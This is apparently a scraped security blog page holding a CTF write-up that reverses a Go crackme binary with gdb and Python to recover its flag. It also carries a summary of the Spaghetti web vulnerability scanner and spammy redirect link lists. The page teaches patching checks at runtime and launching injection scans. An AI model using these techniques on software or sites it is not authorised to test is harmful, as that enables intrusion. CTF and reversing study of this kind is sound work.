href="https://www.google.im/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F06%2Fcreacion-de-laboratorio-virtual-de.html ">Servicio Hacker </a></li><li> <a href="https://www.google.cl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F02%2Fpablo-espada-paso-4-h-c0n-2019.html ">Curso Seguridad Informatica </a></li><li> <a href="https://www.google.ie/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Famazon-elimina-m-de-un-mill-de.html ">Curso Hacker </a></li></ol>

Evolving Logic Until Pass Tests Automatically

Automating the automation is still a challenge, but in some cases it's possible under certain situations. In 2017 I created logic-evolve...

Baca selengkapnya »

inBINcible Writeup - Golang Binary Reversing

<div style="text-align: justify;">This file is an 32bits elf binary, compiled from go language (i guess ... coded by <a href="https://twitter.com/nibble_ds">@nibble_ds</a> ;)</div><div style="text-align: justify;">The binary has some debugging symbols, which is very helpful to locate the functions and api calls.</div><div style="text-align: justify;"> </div><div style="text-align: justify;">GO source functions:</div><div style="text-align: justify;">-  main.main</div><div style="text-align: justify;">-  main.function.001</div><div style="text-align: justify;"> </div><div style="text-align: justify;">If the binary is executed with no params, it prints "Nope!", the bad guy message.</div><div style="text-align: justify;"> </div><div style="text-align: justify;">~/ncn$ ./inbincible </div><div style="text-align: justify;">Nope!</div><div style="text-align: justify;"> </div><div style="text-align: justify;">Decompiling the main.main function I saw two things:</div><div style="text-align: justify;"> </div><div style="text-align: justify;">1. The Argument validation: Only one 16 bytes long argument is needed, otherwise the execution is finished.</div><div style="text-align: justify;"> </div><div style="text-align: justify;">2. The key IF, the decision to dexor and print byte by byte the "Nope!" string OR dexor and print "Yeah!"</div> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEIf2uFq0SlQTArxOpe3HRG4vSME7S4nvNj4L2d-uTEFWOOOEcHURypvwYJ_373t5141_aPRJ5wT3g6rbO0WpPSIRwWz3zs7gVlxRNSQwfh8OQZgxkhUGLWzL5hjebYN33khDA2GAd3Hk/s1600/if_clave.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEIf2uFq0SlQTArxOpe3HRG4vSME7S4nvNj4L2d-uTEFWOOOEcHURypvwYJ_373t5141_aPRJ5wT3g6rbO0WpPSIRwWz3zs7gVlxRNSQwfh8OQZgxkhUGLWzL5hjebYN33khDA2GAd3Hk/s1600/if_clave.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The incoming channel will determine the final message.</td></tr></tbody></table> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6s1lgY1JLF-MvmXXg3mBA9Fd51CJQftfMpsQov3O8oGJeFv0B7NJ4RR0Yr4lX0-iNRJBc_qKANVsum-xHAU6Ky4tUQDogmKpmESGCZxT5tWLehV1c41Xp4Im7FGAjXYKYLmLVfRn1bHk/s1600/xor_print.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6s1lgY1JLF-MvmXXg3mBA9Fd51CJQftfMpsQov3O8oGJeFv0B7NJ4RR0Yr4lX0-iNRJBc_qKANVsum-xHAU6Ky4tUQDogmKpmESGCZxT5tWLehV1c41Xp4Im7FGAjXYKYLmLVfRn1bHk/s1600/xor_print.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dexor and print each byte of the "Nope!" message.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"> </div> <div style="text-align: justify;">This IF, checks 16 times if the go channel reception value is 0x01, in this case the app show the "Yeah!" message.</div><div style="text-align: justify;"> </div><div style="text-align: justify;">Go channels are a kind of thread-safe queue, a channel_send is like a push, and channel_receive is like a pop.</div><div style="text-align: justify;"> </div><div style="text-align: justify;">If we fake this IF the 16 times, we got the "Yeah!" message:</div> (gdb) b *0x8049118 (gdb) commands >set {char *}0xf7edeef3 = 0x01 >c >end (gdb) r 1234567890123456 tarting program: /home/sha0/ncn/inbincible 1234567890123456 ... Yeah! <div style="text-align: justify;">Ok, but the problem is not in main.main, is main.function.001 who must sent the 0x01 via channel.</div><div style="text-align: justify;">This function xors byte by byte the input "1234567890123456" with a byte array xor key, and is compared with another byte array.</div> => 0x8049456:       xor    %ebp,%ecx <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnxxB7wqKhX5_uTup6_PKMvGehCdNqxx9z8H8I1Pp5oJ679qiXfhD5OD2NgpK0XSnDdtGlcdeHPp58nDz-mo5Yf-1I1HNXcPEWmzKNhJMdOFXUzYMMb_aomDvoNY9cY5H7i7rBj3Mq5s/s1600/final_xor.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnxxB7wqKhX5_uTup6_PKMvGehCdNqxx9z8H8I1Pp5oJ679qiXfhD5OD2NgpK0XSnDdtGlcdeHPp58nDz-mo5Yf-1I1HNXcPEWmzKNhJMdOFXUzYMMb_aomDvoNY9cY5H7i7rBj3Mq5s/s1600/final_xor.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">This xor,  encode the argument with a key byte by byte</td></tr></tbody></table> The xor key can be dumped from memory but I prefer to use this macro: (gdb) b *0x8049456 (gdb) commands >i r  ecx >c >end (gdb) c Breakpoint 2, 0x08049456 in main.func () ecx            0x12 18 Breakpoint 2, 0x08049456 in main.func () ecx            0x45 69 Breakpoint 2, 0x08049456 in main.func () ecx            0x33 51 Breakpoint 2, 0x08049456 in main.func () ecx            0x87 135 Breakpoint 2, 0x08049456 in main.func () ecx            0x65 101 Breakpoint 2, 0x08049456 in main.func () ecx            0x12 18 Breakpoint 2, 0x08049456 in main.func () ecx            0x45 69 Breakpoint 2, 0x08049456 in main.func () ecx            0x33 51 Breakpoint 2, 0x08049456 in main.func () ecx            0x87 135 Breakpoint 2, 0x08049456 in main.func () ecx            0x65 101 Breakpoint 2, 0x08049456 in main.func () ecx            0x12 18 Breakpoint 2, 0x08049456 in main.func () ecx            0x45 69 Breakpoint 2, 0x08049456 in main.func () ecx            0x33 51 Breakpoint 2, 0x08049456 in main.func () ecx            0x87 135 Breakpoint 2, 0x08049456 in main.func () ecx            0x65 101 Breakpoint 2, 0x08049456 in main.func () ecx            0x12 18 The result of the xor will compared with another array byte,  each byte matched, a 0x01 will be sent. <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiazmNUfeJleT5nnVZclSAzitH-X_fwDEimaT4rkC97hVkgWN4qmCTUfoU1fkhlFz57Mow8XOj9tqJ6OhyphenhyphenzY7R93dtYmiSSJujMgSqoY5D5_tfdJVEOhzkbELtPlw7e_5AL2qEcnznAm6Q/s1600/chanel0or1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiazmNUfeJleT5nnVZclSAzitH-X_fwDEimaT4rkC97hVkgWN4qmCTUfoU1fkhlFz57Mow8XOj9tqJ6OhyphenhyphenzY7R93dtYmiSSJujMgSqoY5D5_tfdJVEOhzkbELtPlw7e_5AL2qEcnznAm6Q/s1600/chanel0or1.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The cmp of the xored argument byte, will determine if the channel send 0 or 1</td></tr></tbody></table> (gdb) b *0x0804946a (gdb) commands >i r al >c >end <div style="text-align: justify;">At this point we have the byte array used to xor the argument, and the byte array to be compared with, if we provide an input that xored with the first byte array gets the second byte array, the code will send 0x01 by the channel the 16 times.</div> Now web have: xorKey=[0x12,0x45,0x33,0x87,0x65,0x12,0x45,0x33,0x87,0x65,0x12,0x45,0x33,0x87,0x65,0x12] mustGive=[0x55,0x75,0x44,0xb6,0x0b,0x33,0x06,0x03,0xe9,0x02,0x60,0x71,0x47,0xb2,0x44,0x33] <div> </div> Xor is reversible, then we can get the input needed to dexor to the expected values in order to send 0x1 bytes through the go channel. >>> x='' >>> for i in range(len(xorKey)): ...     x+= chr(xorKey[i] ^ mustGive[i]) ...  >>> print x G0w1n!C0ngr4t5!! And that's the key :) let's try it: ~/ncn$ ./inbincible 'G0w1n!C0ngr4t5!!' Yeah! Got it!! thanx <a href="https://twitter.com/nibble_ds">@nibble_ds</a> for this funny crackme, programmed in the great go language. I'm also a golang lover. <h3>Read more</h3> <ul><li> <a href="https://www.google.uz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Fas-es-el-nuevo-men-de-inicio-de-windows.html ">Programas Para Hackear </a></li><li> <a href="https://www.google.ps/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F08%2Fsaint-crear-un-spyware-para-windows.html ">Aprender A Hackear Desde Cero </a></li><li> <a href="https://www.google.pn/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F11%2Fhomepwn-poc-xiaomi-devices-discovery.html ">Hacking With Arduino </a></li><li> <a href="https://www.google.ki/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Flibros-de-cybersecurity-casi-gratis.html ">Hacking Raspberry Pi </a></li></ul>

inBINcible Writeup - Golang Binary Reversing

This file is an 32bits elf binary, compiled from go language (i guess ... coded by @nibble_ds ;) The binary has some debugging symbols, whi...

Baca selengkapnya »

Spaghetti: A Website Applications Security Scanner

<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir4YQmpT7Rj-KXgaOfpwRi4tcJmNGncePp7kbkYCV7coTBEnDlTwJ8bFpCOrLSsEGfmfwb8PbgB5E6iyALvstoqmL0mKiJ137bzZWOA8hvBXBod-dP0OJumX1DCk0cq54_rovDt2LzQlk/s1600/spaghetti.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="629" data-original-width="923" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir4YQmpT7Rj-KXgaOfpwRi4tcJmNGncePp7kbkYCV7coTBEnDlTwJ8bFpCOrLSsEGfmfwb8PbgB5E6iyALvstoqmL0mKiJ137bzZWOA8hvBXBod-dP0OJumX1DCk0cq54_rovDt2LzQlk/s1600/spaghetti.png" /></a></div> About Spaghetti    Author: m4ll0k<ul><li>Github: <a href="https://github.com/m4ll0k" target="_blank">m4ll0k</a></li><li>Twitter: <a href="https://twitter.com/m4ll0k2" target="_blank">m4ll0k</a></li></ul>   Spaghetti is an Open Source web application scanner, it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on Python 2.7 and can run on any platform which has a Python environment. Spaghetti Installation:<iframe src="https://pastebin.com/embed_iframe/aNAn54wz" style="border: none; height: 120px; width: 100%;"></iframe> Spaghetti's Features:    Fingerprints: <ul><li>Server:</li><li>Web Frameworks (CakePHP,CherryPy,...)</li><li>Web Application Firewall (Waf)</li><li>Content Management System (CMS)</li><li>Operating System (Linux,Unix,..)</li><li>Language (PHP,Ruby,...)</li><li>Cookie Security</li></ul>   Discovery: <ul><li>Bruteforce:Admin Interface Common Backdoors Common Backup Directory Common Backup File Common Directory Common FileLog File</li><li>Disclosure: Emails, Private IP, Credit Cards</li></ul>   Attacks: <ul><li>HTML Injection</li><li>SQL Injection</li><li>LDAP Injection</li><li>XPath Injection</li><li>Cross Site Scripting (XSS)</li><li>Remote File Inclusion (RFI)</li><li>PHP Code Injection</li></ul>   Other: <ul><li>HTTP Allow Methods</li><li>HTML Object</li><li>Multiple Index</li><li>Robots Paths</li><li>Web Dav</li><li>Cross Site Tracing (XST)</li><li>PHPINFO</li><li>.Listing</li></ul>   Vulns: <ul><li>ShellShock</li><li>Anonymous Cipher (CVE-2007-1858)</li><li>Crime (SPDY) (CVE-2012-4929)</li><li>Struts-Shock</li></ul>Spaghetti Example: <code>python spaghetti --url example.com --scan 0 --random-agent --verbose</code> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3U2vOKrrBfnf1Db-uOZZvDuYPCJaSdlcsp6m8EdA5oUbzAaGVOTypWPvSa-s3CIRIKUUzTTjWtzAgFJYZ9PsC0t26iduHybGV4UdL-SixidPThEuMzTdF6pVyx8XHKeIx6FJ-15NU7m8/s1600/Spaghetti+Example.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1122" data-original-width="923" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3U2vOKrrBfnf1Db-uOZZvDuYPCJaSdlcsp6m8EdA5oUbzAaGVOTypWPvSa-s3CIRIKUUzTTjWtzAgFJYZ9PsC0t26iduHybGV4UdL-SixidPThEuMzTdF6pVyx8XHKeIx6FJ-15NU7m8/s1600/Spaghetti+Example.png" /></a></div> <div style="text-align: center;"><a href="https://github.com/cyberheartmi9/spaghetti" style="font-family: Arial, Helvetica, sans-serif; font-size: xx-large;" target="_blank">Download Spaghetti</a></div>Related articles <ul><li> <a href="https://www.google.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F04%2Fse-hacen-p-4-vulnerabilidades-0day-en.html ">Hacking Smart Tv </a></li><li> <a href="https://www.google.kz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fencontrados-5-zero-days-en-cisco.html ">Como Aprender A Hackear Desde Cero </a></li><li> <a href="https://www.google.fm/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F12%2Fgtrs-google-translator-reverse-shell.html ">Herramientas Hacking Android </a></li><li> <a href="https://www.google.lu/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F06%2Fibombshell-poc-savefunctions.html ">Tipos De Hacker </a></li><li> <a href="https://www.google.am/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F12%2Fdespedida-y-cierre-de-2018.html ">Hacking Books </a></li><li> <a href="https://www.google.dz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Flista-de-dorks-actualizados.html ">Libros De Hacking Pdf </a></li><li> <a href="https://www.google.cm/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F04%2Feternal-check-10.html ">Pagina Hacker </a></li><li> <a href="https://www.google.as/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Fteletrabajo-escritorio-remoto-vs-vpn-vs.html ">Aprender A Hackear Desde Cero </a></li><li> <a href="https://www.google.ge/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Flos-desaf-de-la-ciberseguridad-en.html ">Hacking Language </a></li><li> <a href="https://www.google.so/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fsudokiller-tool-to-identify-and-exploit.html ">Growth Hacking </a></li></ul>

Spaghetti: A Website Applications Security Scanner

About Spaghetti Author: m4ll0k Github: m4ll0k Twitter: m4ll0k Spaghetti is an Open Source web application scanner, it is designed ...

Baca selengkapnya »

Ngak Ngik Nguk

BurpSuite Introduction & Installation

RtlDecompresBuffer Vulnerability

WHAT IS ETHICAL HACKING

Evolving Logic Until Pass Tests Automatically

inBINcible Writeup - Golang Binary Reversing

Spaghetti: A Website Applications Security Scanner

Populer

Tag

Arsip